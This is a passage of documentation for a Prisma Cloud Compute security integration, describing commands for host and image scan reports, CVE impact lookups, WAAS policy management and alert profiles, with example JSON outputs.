"complianceIssues": null,
"repoTag": {
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
},
"packageManager": false,
"repoDigests": [
"123"
],
"id": "image123",
"packages": null,
"complianceDistribution": {
"high": 1,
"total": 1,
"medium": 0,
"critical": 0,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"allCompliance": {},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "Alpine Linux v3.7",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": null,
"scanVersion": "21.04.439",
"type": "image",
"distro": "Alpine Linux v3.7",
"files": null,
"scanID": 0,
"osDistro": "alpine",
"tags": [
{
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
}
],
"Secrets": null,
"osDistroRelease": "3.7.0",
"topLayer": "sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6",
"osDistroVersion": "",
"trustStatus": "trusted",
"firstScanTime": "2021-09-02T11:05:27.439Z",
"_id": "image123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Critical severity": {},
"Medium severity": {},
"DoS": {}
},
"err": "",
"vulnerabilitiesCount": 60,
"scanTime": "2021-12-14T14:19:36.091Z",
"complianceIssuesCount": 1,
"creationTime": "2018-05-10T10:32:49.309Z",
"vulnerabilities": null,
"hosts": {
"host123": {
"modified": "2021-12-14T14:19:36.091Z"
}
},
"complianceRiskScore": 10000,
"wildFireUsage": null,
"binaries": null,
"vulnerabilityRiskScore": 12282000,
"history": null
}
}
}

Human Readable Output#

Image description#

IDImageOS DistributionVulnerabilities CountCompliance Issues Count
image123demisto/python:1.3-alpineAlpine Linux v3.7601

Vulnerability Statistics#

CriticalHighMediumLow
1228200

Compliance Statistics#

CriticalHighMediumLow
0100

prisma-cloud-compute-hosts-scan-list#


Get hosts scan report. The report includes vulnerabilities, compliance issues, binaries, etc.

Base Command#

prisma-cloud-compute-hosts-scan-list

Requires Role#

vulnerabilityManager

Input#

Argument NameDescriptionRequired
clustersA comma-separated list of cluster names to filter the results by.Optional
compactWhether only minimal image data is to be returned (i.e., skip vulnerabilities, compliance, and extended image metadata). Possible values are: true, false. Default is true.Optional
distroA comma-separated list of operating system distros to filter the results by.Optional
fieldsA comma-separated list of fields to return. Possible values are labels, repo, registry, clusters, hosts, tag.Optional
hostnameA comma-separated list of hostnames to filter the results by. Can be retrieved from !prisma-cloud-compute-profile-host-list.Optional
providerA comma-separated list of cloud providers to filter the results by.Optional
compliance_idsA comma-separated list of compliance IDs to filter the results by.Optional
limit_recordThe maximum number of scan host records to return. Default is 10.Optional
limit_statsThe maximum number of compliance/vulnerability records to return. Default is 10.Optional
offsetThe offset by which to begin listing host scan results. Default is 0.Optional
all_resultsWhether to retrieve all results. The "limit_record" and "limit_stats" arguments will be ignored. More than 1,500 results will slow down the process. Possible values are: true, false. Default is false.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ReportHostScan._idStringThe host identifier (host ID or hostname).
PrismaCloudCompute.ReportHostScan.allComplianceUnknownThe data regarding passed compliance checks.
PrismaCloudCompute.ReportHostScan.appEmbeddedBooleanWhether this image was scanned by an app-embedded defender.
PrismaCloudCompute.ReportHostScan.applicationsUnknownProducts in the image.
PrismaCloudCompute.ReportHostScan.binariesUnknownBinaries in the image.
PrismaCloudCompute.ReportHostScan.cloudMetadataUnknownThe metadata for an instance running in a cloud provider (AWS/GCP/Azure).
PrismaCloudCompute.ReportHostScan.clustersStringCluster names.
PrismaCloudCompute.ReportHostScan.collectionsStringCollections to which this result applies.
PrismaCloudCompute.ReportHostScan.complianceDistributionUnknownThe number of vulnerabilities per type.
PrismaCloudCompute.ReportHostScan.complianceIssuesUnknownNumber of compliance issues.
PrismaCloudCompute.ReportHostScan.complianceRiskScoreNumberCompliance risk score for the image.
PrismaCloudCompute.ReportHostScan.creationTimeDateDate/time when the image was created.
PrismaCloudCompute.ReportHostScan.distroStringFull name of the distribution.
PrismaCloudCompute.ReportHostScan.ecsClusterNameStringElastic Container Service (ECS) cluster name.
PrismaCloudCompute.ReportHostScan.errStringDescription of an error that occurred during image health scan.
PrismaCloudCompute.ReportHostScan.externalLabelsUnknownKubernetes external labels of all containers running this image.
PrismaCloudCompute.ReportHostScan.firewallProtectionUnknownThe status of the Web-Application and API Security (WAAS) protection.
PrismaCloudCompute.ReportHostScan.firstScanTimeDateDate/time when this image was first scanned (preserved during version updates).
PrismaCloudCompute.ReportHostScan.historyUnknownDocker image history.
PrismaCloudCompute.ReportHostScan.hostDevicesStringMap from host network device name to IP address.
PrismaCloudCompute.ReportHostScan.hostnameStringName of the host that was scanned.
PrismaCloudCompute.ReportHostScan.hostsUnknownA fast index for image scan results metadata per host.
PrismaCloudCompute.ReportHostScan.imageUnknownA container image.
PrismaCloudCompute.ReportHostScan.installedProductsUnknownData regarding products running in the environment.
PrismaCloudCompute.ReportHostScan.instancesUnknownDetails about each occurrence of the image (tag + host).
PrismaCloudCompute.ReportHostScan.k8sClusterAddrStringEndpoint of the Kubernetes API server.
PrismaCloudCompute.ReportHostScan.namespacesStringKubernetes namespaces of all the containers running this image.
PrismaCloudCompute.ReportHostScan.osDistroStringName of the operating system distribution.
PrismaCloudCompute.ReportHostScan.osDistroReleaseStringOperating system distribution release.
PrismaCloudCompute.ReportHostScan.osDistroVersionStringOperating system distribution version.
PrismaCloudCompute.ReportHostScan.packageManagerBooleanWhether the package manager is installed for the operating system.
PrismaCloudCompute.ReportHostScan.packagesUnknownThe packages that exist in the image.
PrismaCloudCompute.ReportHostScan.repoDigestsStringDigests of the image. Used for content trust (notary). Has one digest per tag.
PrismaCloudCompute.ReportHostScan.repoTagUnknownAn image repository and its associated tag or registry digest.
PrismaCloudCompute.ReportHostScan.riskFactorsUnknownMaps of the existence of vulnerability risk factors.
PrismaCloudCompute.ReportHostScan.scanIDStringScan ID.
PrismaCloudCompute.ReportHostScan.scanTimeDateDate/time of the last scan of the image.
PrismaCloudCompute.ReportHostScan.scanVersionStringDefender version that published the image.
PrismaCloudCompute.ReportHostScan.startupBinariesUnknownBinaries that are expected to run when the container is created from this image.
PrismaCloudCompute.ReportHostScan.tagsUnknownTags associated with the given image.
PrismaCloudCompute.ReportHostScan.topLayerStringSHA256 of the image's last layer that is the last element of the Layers field.
PrismaCloudCompute.ReportHostScan.trustStatusStringThe trust status for an image.
PrismaCloudCompute.ReportHostScan.typeUnknownThe scanning type performed.
PrismaCloudCompute.ReportHostScan.vulnerabilitiesUnknownCVE vulnerabilities of the host.
PrismaCloudCompute.ReportHostScan.vulnerabilitiesCountNumberTotal number of vulnerabilities.
PrismaCloudCompute.ReportHostScan.vulnerabilityDistributionUnknownThe number of vulnerabilities per type.
PrismaCloudCompute.ReportHostScan.vulnerabilityRiskScoreNumberImage's CVE risk score.
PrismaCloudCompute.ReportHostScan.wildFireUsageUnknownThe Wildfire usage stats. The period for the usage varies with the context.
PrismaCloudCompute.ReportHostScan.complianceIssuesCountUnknownNumber of compliance issues.

Command Example#

!prisma-cloud-compute-hosts-scan-list hostname=host123 compact=false limit_stats=2

Context Example#

{
"PrismaCloudCompute": {
"ReportHostScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "host123",
"vulnerabilityDistribution": {
"high": 4,
"total": 191,
"medium": 78,
"critical": 0,
"low": 109
},
"creationTime": "0001-01-01T00:00:00Z",
"image": {
"created": "0001-01-01T00:00:00Z"
},
"labels": [
"osDistro:ubuntu",
"osVersion:16.04"
],
"instances": [],
"complianceIssues": [
{
"templates": [
"GDPR"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 16,
"severity": "high",
"title": "(CIS_Docker_CE_v1.1.0 - 1.4) Only allow trusted users to control Docker daemon",
"packageVersion": "",
"cause": "1 users in docker group: demisto",
"cvss": 0,
"status": "",
"twistlock": false,
"fixDate": "",
"description": "Docker allows you to share a directory between the Docker host and a guest container\nwithout limiting the access rights of the container. This means that you can start a\ncontainer and map the / directory on your host to the container. The container will then be\nable to alter your host file system without any restrictions. In simple terms, it means that\nyou can attain elevated privileges with just being a member of the docker group and then\nstarting a container with mapped / directory on the host",
"link": "",
"cri": false,
"riskFactors": null,
"type": "host_config",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
},
{
"templates": [
"PCI",
"HIPAA"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 21,
"severity": "high",
"title": "(CIS_Docker_v1.2.0 - 2.1) Restrict network traffic between containers",
"packageVersion": "",
"cause": "",
"cvss": 0,
"status": "",
"twistlock": false,
"fixDate": "",
"description": "By default, all network traffic is allowed between containers on the same host on the\ndefault network bridge. If not desired, restrict all the inter-container communication. Link\nspecific containers together that require communication. Alternatively, you can create\ncustom network and only join containers that need to communicate to that custom\nnetwork",
"link": "",
"cri": false,
"riskFactors": null,
"type": "daemon_config",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
}
],
"repoTag": null,
"packageManager": true,
"repoDigests": [],
"allCompliance": {},
"packages": [
{
"pkgsType": "package",
"pkgs": [
{
"name": "kbd",
"version": "1.15.5-1ubuntu5",
"cveCount": 5,
"license": "GPL-2+",
"layerTime": 0
},
{
"name": "xdg-utils",
"version": "1.1.1-1ubuntu1.16.04.5",
"cveCount": 50,
"license": "",
"layerTime": 0
}
]
}
],
"complianceDistribution": {
"high": 16,
"total": 17,
"medium": 0,
"critical": 1,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "xenial",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": [],
"type": "host",
"distro": "Ubuntu 16.04.2 LTS",
"files": [],
"scanID": 0,
"osDistro": "ubuntu",
"tags": [],
"Secrets": [],
"applications": [
{
"knownVulnerabilities": 20,
"path": "",
"version": "17.06.0-ce",
"layerTime": 0,
"name": "docker"
}
],
"osDistroRelease": "xenial",
"osDistroVersion": "16.04",
"trustStatus": "",
"firstScanTime": "0001-01-01T00:00:00Z",
"_id": "host123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Exploit exists": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Medium severity": {},
"DoS": {},
"Package in use": {}
},
"err": "",
"vulnerabilitiesCount": 191,
"scanTime": "2021-12-15T14:19:48.792Z",
"complianceIssuesCount": 17,
"hostDevices": [
{
"ip": "1.1.1.1",
"name": "eth0"
}
],
"vulnerabilities": [
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"text": "",
"discovered": "2020-11-04T18:15:00Z",
"exploit": "",
"layerTime": 0,
"id": 46,
"applicableRules": [
"*"
],
"severity": "low",
"title": "",
"packageVersion": "4.9.3-0ubuntu0.16.04.1",
"cause": "",
"cvss": 7.5,
"status": "needed",
"twistlock": false,
"fixDate": "",
"description": "The ppp decapsulator in tcpdump 4.9.3 can be convinced to allocate a large amount of memory.",
"link": "https://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-8037",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {}
},
"type": "image",
"packageName": "tcpdump",
"functionLayer": "",
"published": 1604513700,
"cve": "CVE-2020-8037"
},
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"text": "",
"discovered": "2021-04-29T05:15:00Z",
"exploit": "",
"layerTime": 0,
"id": 46,
"applicableRules": [
"*"
],
"severity": "medium",
"title": "",
"packageVersion": "1.17.1-1ubuntu1.5",
"cause": "",
"cvss": 6.1,
"status": "deferred",
"twistlock": false,
"fixDate": "",
"description": "GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.",
"link": "https://people.canonical.com/~ubuntu-security/cve/2021/CVE-2021-31879",
"cri": false,
"riskFactors": {
"Medium severity": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {}
},
"type": "image",
"packageName": "wget",
"functionLayer": "",
"published": 1619673300,
"cve": "CVE-2021-31879"
}
],
"hosts": {},
"complianceRiskScore": 1160000,
"wildFireUsage": null,
"binaries": [
{
"services": [
"lxcfs"
],
"path": "/usr/bin/lxcfs",
"cveCount": 0,
"name": "lxcfs",
"md5": ""
},
{
"services": [
"systemd-udevd"
],
"path": "/lib/systemd/systemd-udevd",
"cveCount": 0,
"name": "systemd-udevd",
"md5": ""
}
],
"vulnerabilityRiskScore": 47909,
"history": []
}
}
}

Human Readable Output#

Host description#

HostnameDocker VersionOS DistributionVulnerabilities CountCompliance Issues Count
host12317.06.0-ceUbuntu 16.04.2 LTS19117

Vulnerabilities#

CveDescriptionSeverityPackage NameStatus
CVE-2020-8037The ppp decapsulator in tcpdump 4.9.3 can be convinced to allocate a large amount of memory.lowtcpdumpneeded
CVE-2021-31879GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.mediumwgetdeferred

Compliances#

IdSeverityDescription
16highDocker allows you to share a directory between the Docker host and a guest container
without limiting the access rights of the container. This means that you can start a
container and map the / directory on your host to the container. The container will then be
able to alter your host file system without any restrictions. In simple terms, it means that
you can attain elevated privileges with just being a member of the docker group and then
starting a container with mapped / directory on the host
21highBy default, all network traffic is allowed between containers on the same host on the
default network bridge. If not desired, restrict all the inter-container communication. Link
specific containers together that require communication. Alternatively, you can create
custom network and only join containers that need to communicate to that custom
network

Command Example#

!prisma-cloud-compute-hosts-scan-list hostname=host123 compact=true limit_stats=2

Context Example#

{
"PrismaCloudCompute": {
"ReportHostScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "host123",
"vulnerabilityDistribution": {
"high": 4,
"total": 191,
"medium": 78,
"critical": 0,
"low": 109
},
"creationTime": "0001-01-01T00:00:00Z",
"image": {
"created": "0001-01-01T00:00:00Z"
},
"labels": [
"osDistro:ubuntu",
"osVersion:16.04"
],
"instances": [],
"complianceIssues": null,
"repoTag": null,
"packageManager": false,
"repoDigests": [],
"allCompliance": {},
"packages": null,
"complianceDistribution": {
"high": 16,
"total": 17,
"medium": 0,
"critical": 1,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "xenial",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": null,
"type": "host",
"distro": "Ubuntu 16.04.2 LTS",
"files": null,
"scanID": 0,
"osDistro": "ubuntu",
"tags": [],
"Secrets": null,
"osDistroRelease": "xenial",
"osDistroVersion": "",
"trustStatus": "",
"firstScanTime": "0001-01-01T00:00:00Z",
"_id": "host123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Exploit exists": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Medium severity": {},
"DoS": {},
"Package in use": {}
},
"err": "",
"vulnerabilitiesCount": 191,
"scanTime": "2021-12-15T14:19:48.792Z",
"complianceIssuesCount": 17,
"hostDevices": [
{
"ip": "1.1.1.1",
"name": "eth0"
}
],
"vulnerabilities": null,
"hosts": {},
"complianceRiskScore": 1160000,
"wildFireUsage": null,
"binaries": null,
"vulnerabilityRiskScore": 47909,
"history": null
}
}
}

Human Readable Output#

Host description#

HostnameOS DistributionVulnerabilities CountCompliance Issues Count
host123Ubuntu 16.04.2 LTS19117

Vulnerability Statistics#

CriticalHighMediumLow
0478109

Compliance Statistics#

CriticalHighMediumLow
11600

prisma-cloud-compute-vulnerabilities-impacted-resources-list#


Get the list of Prisma Cloud Compute vulnerabilities resources.

Base Command#

prisma-cloud-compute-vulnerabilities-impacted-resources-list

Requires Role#

vulnerabilityManager

Input#

Argument NameDescriptionRequired
cveComma-separated list of CVEs IDs that can be used as a pivot for the impacted resource search. For example cve=CVE-2018-14600,CVE-2021-31535.Optional
limitThe maximum records of impacted hosts/images to return. Default is 50.Optional
offsetThe offset by which to begin listing impacted hosts/images records. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.VulnerabilitiesImpactedResource._idStringThe CVE ID. (The index for the impacted resources).
PrismaCloudCompute.VulnerabilitiesImpactedResource.functionsUnknownThe mapping between the function ID and its details.
PrismaCloudCompute.VulnerabilitiesImpactedResource.hostsStringThe list of impacted hosts.
PrismaCloudCompute.VulnerabilitiesImpactedResource.riskTreeUnknownThe risk tree associated with the CVE ID.

Command Example#

!prisma-cloud-compute-vulnerabilities-impacted-resources-list cve=CVE-2021-31535,CVE-2018-14600

Context Example#

{
"PrismaCloudCompute": {
"VulnerabilitiesImpactedResource": [
{
"_id": "CVE-2021-31535",
"hosts": [
"host1"
],
"riskTree": {
"sha256:c24dea8ef267038c3c1d64b66c7cd660df85563146af841c1b452b291093abdf": [
{
"image": "image1",
"factors": {}
}
],
"sha256:dccfc7e8628161ff6f859cb74aa9de07f1b2650554532b6103658d8831e6991f": [
{
"image": "image2",
"factors": {}
}
]
}
},
{
"_id": "CVE-2018-14600",
"riskTree": {
"sha256:c24dea8ef267038c3c1d64b66c7cd660df85563146af841c1b452b291093abdf": [
{
"image": "image3",
"factors": {}
}
],
"sha256:dccfc7e8628161ff6f859cb74aa9de07f1b2650554532b6103658d8831e6991f": [
{
"image": "image4",
"factors": {}
}
]
}
}
]
}
}

Human Readable Output#

Impacted Images#

CveImage
CVE-2021-31535image1
CVE-2021-31535image2
CVE-2018-14600image3
CVE-2018-14600image4

Impacted Hosts#

CveHostname
CVE-2021-31535host1

prisma-cloud-compute-get-waas-policies#


Get the Waas Container Policies from Defend >> WAAS >> Containers

Base Command#

prisma-cloud-compute-get-waas-policies

Input#

Argument NameDescriptionRequired

Context Output#

PathTypeDescription
PrismaCloudCompute.Policies.NameStringThe WaaS policy Name.
PrismaCloudCompute.Policies.WaasPolicy.ATPStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.CodeInjectionStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.SQLInjectionStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.DetectInformationLeakageStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.CrossSiteScriptingXSSStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.OSCommandInjetionStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.AttackToolsAndVulnScannersStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.LocalFileInclusionStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.ShellshockStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.MalformedHTTPRequestStringThe list of Waas Policies and there current setting.

Command example#

!prisma-cloud-compute-get-waas-policies

Context Example#

{
"PrismaCloudCompute": {
"Policies": {
"Name": "dvwa",
"WaasPolicy": [
{
"ATP": "alert",
"AttackToolsAndVulnScanners": "alert",
"CodeInjection": "alert",
"CrossSiteScriptingXSS": "alert",
"DetectInformationLeakage": "alert",
"LocalFileInclusion": "alert",
"MalformedHTTPRequest": "alert",
"OSCommandInjetion": "alert",
"SQLInjection": "ban",
"Shellshock": "alert"
}
]
}
}
}

Human Readable Output#

dvwa#

ATPAttackToolsAndVulnScannersCodeInjectionCrossSiteScriptingXSSDetectInformationLeakageLocalFileInclusionMalformedHTTPRequestOSCommandInjetionSQLInjectionShellshock
alertalertalertalertalertalertalertalertbanalert

prisma-cloud-compute-update-waas-policies#


Update the Waas Policy for containers

Base Command#

prisma-cloud-compute-update-waas-policies

Input#

Argument NameDescriptionRequired
policyThe complete policy object. Get it by running prisma-cloud-compute-get-waas-policies raw-response=true extend-context=PCC=.Required
attack_typeThe specific policy to update. Possible values are: sqli, xss, cmdi, codeInjection, lfi, attackTools, shellshock, malformedReq, advancedProtectionEffect, intelGathering.Required
actionThe new policy action for the attack type. Possible values are: ban, prevent, alert, allow, disable, reCAPTCHA.Required
rule_nameThe rule name for the WaaS policy settings.Required

Context Output#

There is no context output for this command.

Human Readable Output#

Successfully updated the WaaS policy

prisma-cloud-compute-get-audit-firewall-container-alerts#


Get the audits for the firewall container policies

Base Command#

prisma-cloud-compute-get-audit-firewall-container-alerts

Input#

Argument NameDescriptionRequired
ImageNameThe image name to get the alerts for.Required
FromDaysThe Number of days back to look.Optional
audit_typeThe type of audit alert to retrieve.Required

Context Output#

There is no context output for this command.

Command example#

``!prisma-cloud-compute-get-audit-firewall-container-alerts audit_type=lfi ImageName=vulnerables/web-dvwa:latest````

Human Readable Output#

Audits#

No entries.

Known limitations:#

When fetching an incident from the Prisma Cloud Compute platform, the platform will delete the fetched incident. Therefore, it is recommended to configure only one instance per user to fetch incidents.

prisma-cloud-compute-get-alert-profiles#


Get the available alert alert profiles from a specific project.

Base Command#

prisma-cloud-compute-get-alert-profiles

Input#

Argument NameDescriptionRequired
projectThe project to get the alert profiles for.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.AlertProfiles.Cortex.ApplicationStringThe alert profile application.
PrismaCloudCompute.AlertProfiles.Cortex.CredentialIdStringThe credential ID.
PrismaCloudCompute.AlertProfiles.Cortex.EnabledBooleanWhether the alert profile is enabled.
PrismaCloudCompute.AlertProfiles.Cortex.UrlStringThe alert profile URL.
PrismaCloudCompute.AlertProfiles.Email.CredentialIdStringThe alert profile credential ID.
PrismaCloudCompute.AlertProfiles.Email.EnabledBooleanThe email setting for the alert profile.
PrismaCloudCompute.AlertProfiles.Email.FromStringThe from setting for the email profile.
PrismaCloudCompute.AlertProfiles.Email.PortNumberThe email alert profile port.
PrismaCloudCompute.AlertProfiles.Email.SmtpAddressStringThe SMTP address.
PrismaCloudCompute.AlertProfiles.Email.SslBooleanThe email alert profile SSL.
PrismaCloudCompute.AlertProfiles.GcpPubsub.CredentialIdStringThe credential ID.
PrismaCloudCompute.AlertProfiles.GcpPubsub.EnabledBooleanWhether the GCP Pub Sub is enabled.
PrismaCloudCompute.AlertProfiles.GcpPubsub.TopicStringThe GCP Pub Sub topic.
PrismaCloudCompute.AlertProfiles.Jira.BaseUrlStringThe Jira base URL.
PrismaCloudCompute.AlertProfiles.Jira.CaCertStringThe Jira CA Cert.
PrismaCloudCompute.AlertProfiles.Jira.CredentialIdStringThe Jira credential ID.
PrismaCloudCompute.AlertProfiles.Jira.EnabledBooleanJira alert profile status.
PrismaCloudCompute.AlertProfiles.Jira.IssueTypeStringThe Jira issue type.
PrismaCloudCompute.AlertProfiles.Jira.PriorityStringThe Jira priority.
PrismaCloudCompute.AlertProfiles.LastErrorStringThe last error.
PrismaCloudCompute.AlertProfiles.ModifiedDateThe modified time.
PrismaCloudCompute.AlertProfiles.NameStringThe alert profile name.
PrismaCloudCompute.AlertProfiles.OwnerStringThe alert profile owner.
PrismaCloudCompute.AlertProfiles.Pagerduty.RoutingKey.EncryptedStringThe PagerDuty routing key encryption status.
PrismaCloudCompute.AlertProfiles.Pagerduty.SeverityStringThe PagerDuty severity.
PrismaCloudCompute.AlertProfiles.Pagerduty.SummaryStringThe PagerDuty summary.
PrismaCloudCompute.AlertProfiles.Policy.Admission.AllRulesBooleanThe policy all rules.
PrismaCloudCompute.AlertProfiles.Policy.Admission.EnabledBooleanWhether the admission is enabled.
PrismaCloudCompute.AlertProfiles.Policy.AgentlessAppFirewall.AllRulesBooleanThe agentless app firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.AgentlessAppFirewall.EnabledBooleanWhether the agentless app firewall is enabled.
PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedAppFirewall.AllRulesBooleanApp embedded firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedAppFirewall.EnabledBooleanWhether the app embedded firewall is enabled.
PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedRuntime.AllRulesBooleanApp embedded runtime rules.
PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedRuntime.EnabledBooleanWhether the app embedded runtime is enabled.
PrismaCloudCompute.AlertProfiles.Policy.CloudDiscovery.AllRulesBooleanThe cloud discovery rules.
PrismaCloudCompute.AlertProfiles.Policy.CloudDiscovery.EnabledBooleanWhether the cloud discovery is enabled.
PrismaCloudCompute.AlertProfiles.Policy.CodeRepoVulnerability.AllRulesBooleanThe code repo vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.CodeRepoVulnerability.EnabledBooleanWhether the code repo vulnerability is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ContainerAppFirewall.AllRulesBooleanThe container app firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.ContainerAppFirewall.EnabledBooleanWhether the container app firewall is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ContainerCompliance.AllRulesBooleanThe container compliance rules.
PrismaCloudCompute.AlertProfiles.Policy.ContainerCompliance.EnabledBooleanWhether the container compliance is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ContainerComplianceScan.AllRulesBooleanThe container compliance scan rules.
PrismaCloudCompute.AlertProfiles.Policy.ContainerComplianceScan.EnabledBooleanWhether the container compliance scan is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ContainerRuntime.AllRulesBooleanThe container runtime rules.
PrismaCloudCompute.AlertProfiles.Policy.ContainerRuntime.EnabledBooleanWhether the container runtime is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ContainerVulnerability.AllRulesBooleanThe container vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.ContainerVulnerability.EnabledBooleanWhether the container vulnerability is enabled.
PrismaCloudCompute.AlertProfiles.Policy.Defender.AllRulesBooleanThe Defender policy rules.
PrismaCloudCompute.AlertProfiles.Policy.Defender.EnabledBooleanWhether the Defender policy is enabled.
PrismaCloudCompute.AlertProfiles.Policy.Docker.AllRulesBooleanThe Docker rules.
PrismaCloudCompute.AlertProfiles.Policy.Docker.EnabledBooleanWhether the Docker rules are enabled.
PrismaCloudCompute.AlertProfiles.Policy.HostAppFirewall.AllRulesBooleanThe app host firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.HostAppFirewall.EnabledBooleanWhether the host app firewall is enabled.
PrismaCloudCompute.AlertProfiles.Policy.HostCompliance.AllRulesBooleanThe host compliance rules.
PrismaCloudCompute.AlertProfiles.Policy.HostCompliance.EnabledBooleanWhether the host compliance is enabled.
PrismaCloudCompute.AlertProfiles.Policy.HostComplianceScan.AllRulesBooleanThe host compliance scan rules.
PrismaCloudCompute.AlertProfiles.Policy.HostComplianceScan.EnabledBooleanWhether the host compliance scan is enabled.
PrismaCloudCompute.AlertProfiles.Policy.HostRuntime.AllRulesBooleanThe host runtime rules.
PrismaCloudCompute.AlertProfiles.Policy.HostRuntime.EnabledBooleanWhether the host runtime rules are enabled.
PrismaCloudCompute.AlertProfiles.Policy.HostVulnerability.AllRulesBooleanThe host vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.HostVulnerability.EnabledBooleanWhether the host vulnerability rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.Incident.AllRulesBooleanThe policy incident rules.
PrismaCloudCompute.AlertProfiles.Policy.Incident.EnabledBooleanWhether the policy incident is enabled.
PrismaCloudCompute.AlertProfiles.Policy.KubernetesAudit.AllRulesBooleanThe K8S rules.
PrismaCloudCompute.AlertProfiles.Policy.KubernetesAudit.EnabledBooleanWhether K8S is enabled.
PrismaCloudCompute.AlertProfiles.Policy.NetworkFirewall.AllRulesBooleanThe network firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.NetworkFirewall.EnabledBooleanWhether the network firewall rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.RegistryVulnerability.AllRulesBooleanThe registry vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.RegistryVulnerability.EnabledBooleanWhether the registry vulnerability rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessAppFirewall.AllRulesBooleanThe servervless app firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessAppFirewall.EnabledBooleanWhether the serverless app firewall rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessRuntime.AllRulesBooleanThe serverless runtime rules.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessRuntime.EnabledBooleanWhether the serverless runtime rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.VmCompliance.AllRulesBooleanThe VM compliance rules.
PrismaCloudCompute.AlertProfiles.Policy.VmCompliance.EnabledBooleanWhether the VM compliance rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.VmVulnerability.AllRulesBooleanThe VM vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.VmVulnerability.EnabledBooleanWhether the VM vulnerability rules are enabled.
PrismaCloudCompute.AlertProfiles.Policy.WaasHealth.AllRulesBooleanThe WAAS health rules.
PrismaCloudCompute.AlertProfiles.Policy.WaasHealth.EnabledBooleanWhether the WAAS health rules are enabled.
PrismaCloudCompute.AlertProfiles.PreviousNameStringThe alert profile previous name.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.CredentialIDStringThe security advisor credential ID.
